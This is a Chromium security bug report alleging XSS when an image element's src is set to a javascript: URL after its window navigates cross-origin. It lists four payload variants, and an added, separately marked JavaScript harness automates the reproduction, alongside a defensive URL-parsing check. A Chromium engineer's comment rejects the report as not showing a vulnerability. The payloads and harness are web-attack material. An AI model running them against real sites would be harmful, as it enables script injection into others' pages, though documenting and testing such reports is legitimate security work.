XSS via img.src to javascript:URL
Reported by mishra.d...@gmail.com, Mar 7 2017
Issue description
UserAgent: Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101 Firefox/45.0
Steps to reproduce the problem:
1. Get an image element (I) that was created in a document that was loaded in
another window (W).
2. Load a page from another domain (X) into W.
3. Set I.src to a javascript: URL.
A script is executed in the context of X, and its principal is a null principal
(and, on branches, it's a codebase principal whose URI is "javascript:...").
This means that the script cannot directly access properties of X's global
scope. But the script can create a function that has X's principal by
using a named function expression or a nested function.
For Example:
img.src = "javascript:alert(1)";
-> Permission denied to get property Window.alert
img.src = "javascript:(function() { alert(1) }).call('')";
-> Permission denied to get property Window.alert
img.src = "javascript:(function f() { alert(1) }).call('')";
-> ok
img.src = "javascript:(function() { (function() { alert(1) }).call(''); }).call('')";
-> ok
What is the expected behavior?
What went wrong?
Demo URL : http://hackies.in/xss.html
Did this work before? N/A
Chrome version: 57.0.2987.88 (Official Build) beta (64-bit) Channel: beta
OS Version: V8 5.7.492.60
Flash Version: Shockwave Flash 24.0 r0
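The three steps and the four payload variants above, driven from code, as an added example that is not part of the report or of any browser's own code. The harness only does what the report describes (open a window, keep a reference to an image element created there, navigate the window cross-origin, then assign the javascript: URL); whether anything executes, and in which scope, is what you observe in the browser under test, and comment 1 below records that this was not accepted as a Chrome issue. ORIGIN_A_PAGE, TARGET_X and the 3-second navigation delay are assumptions. The isJavascriptUrl helper is the part a defender wants: it uses the WHATWG URL parser, which strips leading C0 controls and spaces, drops tabs and newlines, and lowercases the scheme, so a naive startsWith("javascript:") filter on img.src values would miss inputs the browser still treats as javascript: URLs. That helper runs in Node as well as in a browser.

```javascript
// Added example (not from the bug report). Assumed values:
const ORIGIN_A_PAGE = "/blank.html";       // assumption: a page same-origin with this script
const TARGET_X = "https://example.org/";    // assumption: any cross-origin page
const NAV_DELAY_MS = 3000;                  // assumption: time for the navigation to X to finish

// The four payload variants from the report, in the order given there.
const PAYLOADS = [
  "javascript:alert(1)",
  "javascript:(function() { alert(1) }).call('')",
  "javascript:(function f() { alert(1) }).call('')",
  "javascript:(function() { (function() { alert(1) }).call(''); }).call('')",
];

// True when the browser would parse `value` as a javascript: URL after the
// WHATWG URL normalisation steps (trim C0/space, remove tab/newline, lowercase
// scheme). Relative values resolve against an http: base and so return false.
function isJavascriptUrl(value) {
  try {
    return new URL(value, "http://localhost/").protocol === "javascript:";
  } catch (e) {
    return false; // unparsable input is not a javascript: URL
  }
}

// Steps 1-3 of the report as a browser-only harness. Returns a promise that
// resolves with the image element once its src has been assigned in step 3.
function runRepro(payload) {
  if (typeof window === "undefined") {
    throw new Error("runRepro needs a browser window");
  }
  // Step 1: open W on a same-origin page and create an img element (I) in its
  // document. The reference to I is kept after W navigates away.
  const W = window.open(ORIGIN_A_PAGE, "W");
  return new Promise((resolve) => {
    W.addEventListener("load", () => {
      const I = W.document.createElement("img");
      // Step 2: navigate W to the cross-origin page X.
      W.location = TARGET_X;
      // Step 3: once X has loaded, assign the javascript: URL to I.src and
      // watch whether alert(1) fires, as the report describes.
      setTimeout(() => {
        I.src = payload;
        resolve(I);
      }, NAV_DELAY_MS);
    }, { once: true });
  });
}

// Convenience: run all four variants sequentially in a browser console.
async function runAll() {
  for (const p of PAYLOADS) {
    await runRepro(p);
  }
}
```

In a browser console on a page of the assumed origin, `runAll()` walks through the four variants; in Node only the helper is usable, e.g. `isJavascriptUrl("  JavaScript:alert(1)")` is true.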
Comment 1 by elawrence@chromium.org, Mar 7 2017
The "repro" file does not represent the issue described. There's no reason to believe Chrome has a vulnerability here.

Jun 14 2017
This bug has been closed for more than 14 weeks. Removing security view restrictions. For more details visit https://www.chromium.org/issue-tracking/autotriage - Your friendly Sheriffbot